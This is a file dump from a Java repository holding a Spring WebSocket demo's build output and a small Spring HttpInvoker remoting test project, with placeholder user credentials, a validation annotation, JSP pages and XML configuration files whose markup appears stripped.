/Projects/Spring-WebSocket-without-STOMP/target/classes/static/main.css:
--------------------------------------------------------------------------------
1 | body {
2 | background-color: #f5f5f5;
3 | }
4 |
5 | #main-content {
6 | max-width: 940px;
7 | padding: 2em 3em;
8 | margin: 0 auto 20px;
9 | background-color: #fff;
10 | border: 1px solid #e5e5e5;
11 | -webkit-border-radius: 5px;
12 | -moz-border-radius: 5px;
13 | border-radius: 5px;
14 | }
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/demo-0.0.1-SNAPSHOT.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/demo-0.0.1-SNAPSHOT.jar
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/demo-0.0.1-SNAPSHOT.jar.original:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/demo-0.0.1-SNAPSHOT.jar.original
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/maven-archiver/pom.properties:
--------------------------------------------------------------------------------
1 | #Generated by Maven
2 | #Wed Jul 13 14:51:49 CST 2022
3 | version=0.0.1-SNAPSHOT
4 | groupId=com.example
5 | artifactId=demo
6 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst:
--------------------------------------------------------------------------------
1 | com/example/demo/DemoApplication.class
2 | com/example/demo/ProtocolBufferSocketHandler.class
3 | com/example/demo/WebSocketConfig.class
4 | com/example/demo/SocketHandler.class
5 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst:
--------------------------------------------------------------------------------
1 | /Users/dxy/Downloads/Spring-WebSocket-Demo/src/main/java/com/example/demo/SocketHandler.java
2 | /Users/dxy/Downloads/Spring-WebSocket-Demo/src/main/java/com/example/demo/ProtocolBufferSocketHandler.java
3 | /Users/dxy/Downloads/Spring-WebSocket-Demo/src/main/java/com/example/demo/WebSocketConfig.java
4 | /Users/dxy/Downloads/Spring-WebSocket-Demo/src/main/java/com/example/demo/DemoApplication.java
5 |
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Created-By: IntelliJ IDEA
3 | Built-By: dxy
4 | Build-Jdk: version 1.8.0_181
5 |
6 |
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/invoker-client.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/Controller/Client.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/Controller/Client.class
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/Controller/TestController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/Controller/TestController.class
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/IUserService.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/IUserService.class
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/User.class
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/UserService.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/UserService.class
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/UserServiceImpl.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/UserServiceImpl.class
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/entity/Message.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/entity/Message.class
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/entity/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/entity/User.class
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/service/IUserService.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/service/IUserService.class
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/service/Impl/UserServiceImpl.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/service/Impl/UserServiceImpl.class
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/spring/invoker-client.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/spring/spring-remote.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/index.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: dxy
4 | Date: 2022/12/23
5 | Time: 4:50 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 |
10 |
11 | $Title$
12 |
13 |
14 | $END$
15 |
16 |
17 |
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/resources/invoker-client.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/resources/spring/invoker-client.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/resources/spring/spring-remote.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/SpringConfigTest/src/org/example/User/Client.java:
--------------------------------------------------------------------------------
1 | package org.example.User;
2 |
3 | import org.springframework.context.ApplicationContext;
4 | import org.springframework.context.support.ClassPathXmlApplicationContext;
5 |
6 | public class Client {
7 | public static void main(String[] args) {
8 | // ApplicationContext context=new ClassPathXmlApplicationContext("classpath:spring/spring-remote.xml");
9 | // IUserService userService=(IUserService) context.getBean("userService");
10 | // User user=userService.getUser();
11 | // System.out.println(user.getUsername());
12 | // System.out.println(user.getPassword());
13 |
14 |
15 | ApplicationContext context=new ClassPathXmlApplicationContext("classpath:invoker-client.xml");
16 | IUserService userService=(IUserService) context.getBean("userServiceProxy");
17 | User user=userService.getUser();
18 | System.out.println(user.getUsername());
19 | System.out.println(user.getPassword());
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/SpringConfigTest/src/org/example/User/IUserService.java:
--------------------------------------------------------------------------------
1 | package org.example.User;
2 |
3 | public interface IUserService {
4 | public User getUser();
5 | }
6 |
--------------------------------------------------------------------------------
/SpringConfigTest/src/org/example/User/User.java:
--------------------------------------------------------------------------------
1 | package org.example.User;
2 |
3 | import org.example.Validate.CaseMode;
4 | import org.example.Validate.CheckCase;
5 | import org.hibernate.validator.constraints.NotBlank;
6 |
7 | import java.io.Serializable;
8 |
9 | public class User implements Serializable {
10 | @NotBlank(message = "用户名不能为空")
11 | @CheckCase(CaseMode.LOWER)
12 | private String username;
13 |
14 | @NotBlank(message = "密码不能为空")
15 | private String password;
16 |
17 | public String getUsername() {
18 | return username;
19 | }
20 |
21 | public void setUsername(String username) {
22 | this.username = username;
23 | }
24 |
25 | public String getPassword() {
26 | return password;
27 | }
28 |
29 | public void setPassword(String password) {
30 | this.password = password;
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/SpringConfigTest/src/org/example/User/UserServiceImpl.java:
--------------------------------------------------------------------------------
1 | package org.example.User;
2 |
3 | public class UserServiceImpl implements IUserService {
4 |
5 | public UserServiceImpl() {
6 | super();
7 | }
8 |
9 | // @Override
10 | public User getUser() {
11 | User user = new User();
12 | user.setUsername("admin");
13 | user.setPassword("123456");
14 | return user;
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/SpringConfigTest/src/org/example/Validate/CaseMode.java:
--------------------------------------------------------------------------------
1 | package org.example.Validate;
2 |
3 | public enum CaseMode {
4 | UPPER,
5 | LOWER;
6 | }
7 |
--------------------------------------------------------------------------------
/SpringConfigTest/src/org/example/Validate/CheckCase.java:
--------------------------------------------------------------------------------
1 | package org.example.Validate;
2 |
3 | import javax.validation.Constraint;
4 | import javax.validation.Payload;
5 | import java.lang.annotation.Documented;
6 | import java.lang.annotation.Repeatable;
7 | import java.lang.annotation.Retention;
8 | import java.lang.annotation.Target;
9 |
10 | import static java.lang.annotation.ElementType.ANNOTATION_TYPE;
11 | import static java.lang.annotation.ElementType.FIELD;
12 | import static java.lang.annotation.ElementType.METHOD;
13 | import static java.lang.annotation.ElementType.PARAMETER;
14 | import static java.lang.annotation.ElementType.TYPE_USE;
15 | import static java.lang.annotation.RetentionPolicy.RUNTIME;
16 |
17 | @Target({ FIELD, METHOD, PARAMETER, ANNOTATION_TYPE, TYPE_USE })
18 | @Retention(RUNTIME)
19 | @Constraint(validatedBy = CheckCaseValidator.class)
20 | @Documented
21 | public @interface CheckCase {
22 | String message() default "{javax.validation.constraints.Matches.message}";
23 |
24 | Class[] groups() default { };
25 |
26 | Class[] payload() default { };
27 |
28 | CaseMode value();
29 |
30 | @Target({ FIELD, METHOD, PARAMETER, ANNOTATION_TYPE })
31 | @Retention(RUNTIME)
32 | @Documented
33 | @interface List {
34 | CheckCase[] value();
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/SpringConfigTest/web/WEB-INF/jsp/user.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: dxy
4 | Date: 2022/12/25
5 | Time: 2:05 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 |
10 |
11 | Title
12 |
13 |
14 | username: ${User.username}
15 | <% out.println("
");%>
16 | password: ${User.password}
17 |
18 |
19 |
--------------------------------------------------------------------------------
/SpringConfigTest/web/index.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: dxy
4 | Date: 2022/12/23
5 | Time: 4:50 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 |
10 |
11 | $Title$
12 |
13 |
14 | Spring Config Test
15 |
16 |
17 |
--------------------------------------------------------------------------------
/SpringConfigTest/web/resources/invoker-client.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------